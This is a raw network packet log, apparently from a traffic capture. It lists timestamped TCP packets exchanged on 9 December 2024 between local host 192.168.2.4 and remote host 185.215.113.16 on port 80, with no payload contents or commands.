Dec 9, 2024 08:08:16.855489969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.855575085 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.855619907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.856570005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.856621027 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.856669903 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.856718063 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.857721090 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.857769966 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.857827902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.857954025 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.858896971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.858944893 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.859071016 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.859141111 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.860009909 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.860152006 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.860157013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.860189915 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.861134052 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.861192942 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.861229897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.861325979 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.862315893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.862365007 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.862374067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.862405062 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.863435030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.863490105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.863542080 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.863596916 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.864583969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.864662886 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.864733934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.864778996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.865737915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.865782976 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.865864992 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.865907907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.866864920 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.866909981 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.867072105 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.867173910 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.868027925 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.868134022 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.868170023 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.868210077 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.869158983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.869208097 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.869272947 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.869347095 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.870309114 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.870354891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.870388031 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.870456934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.871474981 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.871558905 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.871603012 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.871654987 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.872647047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.872694969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.872876883 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.872934103 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.874025106 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.874082088 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.874142885 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.874182940 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.874887943 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.874938965 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.875030994 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.875125885 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.876080036 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.876126051 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.876215935 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.876260996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.877353907 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.877412081 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.877475023 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.877516985 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.878341913 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.878402948 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.878458023 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.878555059 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.879518986 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.879579067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.879872084 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.879929066 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.880618095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.880680084 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.880738974 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.880943060 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.881783009 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.881828070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.881895065 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.881946087 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.883042097 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.883112907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.883128881 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.883275032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.884052038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.884095907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.884160995 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.884226084 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.885238886 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.885288000 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.885325909 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.885410070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.886373043 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.886426926 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.886461973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.886563063 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.887510061 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.887630939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.887670040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.887722015 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.888676882 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.888720036 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.888777018 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.888823032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.889811993 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.889872074 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.889950037 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.890016079 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.890974998 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.891069889 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.891134977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.891186953 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.892097950 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.892143011 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.892179966 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.892219067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.893279076 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.893446922 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.893454075 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.893572092 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.894526005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.894567966 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.894608974 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.894658089 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.895555973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.895623922 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.895683050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.895731926 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.896666050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.896713018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.896768093 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.896837950 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.897820950 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.897874117 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.020663977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.020678997 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.020720959 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.020737886 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.021141052 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.021188021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.021225929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.021270037 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.022228003 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.022284031 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.022324085 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.022417068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.023453951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.023519039 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.023555040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.023613930 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.024584055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.024640083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.024662971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.024705887 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.025712967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.025763035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.025859118 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.025913954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.026897907 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.026911020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.026958942 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.026985884 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.037885904 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.037918091 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.037931919 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.037956953 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.038502932 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.038599968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.038626909 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.038657904 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.039652109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.039741039 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.039807081 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.039861917 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.040740967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.040796995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.040812016 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.040877104 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.041858912 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.041917086 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.041930914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.041974068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.043032885 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.043096066 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.043129921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.043168068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.044200897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.044225931 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.044255972 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.044271946 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.045317888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.045367956 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.045411110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.045563936 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.046422958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.046541929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.046596050 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.047626019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.047708035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.047713041 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.047755957 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.048738956 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.048794985 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.049319983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.049369097 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.049891949 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.049938917 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.050007105 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.050055981 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.051150084 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.051162004 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.051213980 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.052212000 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.052258968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.052259922 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.052315950 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.053364038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.053412914 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.053575039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.053627014 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.054481983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.054534912 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.054692984 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.054742098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.055628061 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.055666924 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.055753946 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.055902004 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.056756020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.056895018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.056895971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.056934118 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.057919979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.057965040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.058057070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.058101892 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.059086084 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.059179068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.059247971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.059284925 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.060192108 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.060231924 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.060317039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.060359955 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.061397076 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.061440945 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.061482906 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.061670065 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.062500954 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.062594891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.062601089 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.062642097 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.063699007 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.063739061 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.063807011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.063875914 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.064846039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.064877987 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.064883947 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.064930916 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.184061050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.184082031 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.184094906 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.184108973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.184129953 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.184168100 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.303324938 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.303344011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.303406000 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.303414106 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.303417921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.303457975 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.422616005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422630072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422641039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422660112 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422672033 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422683954 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422699928 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422709942 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422712088 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.422723055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422735929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422746897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422760010 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422771931 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.422776937 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422791004 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422801018 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422807932 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.422813892 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.422842026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.422857046 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423266888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423280001 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423294067 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423305035 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423321009 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423332930 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423345089 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423350096 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423362017 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423367977 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423373938 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423384905 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423393011 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423397064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423409939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423414946 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423422098 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423434019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423445940 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.423446894 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.423485994 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.424084902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424098015 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424109936 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424154043 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.424159050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424175024 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.424201965 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424216032 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424221992 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:17.424230099 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:17.424248934 CET	80	49783	185.215.113.16	192.168.2.4
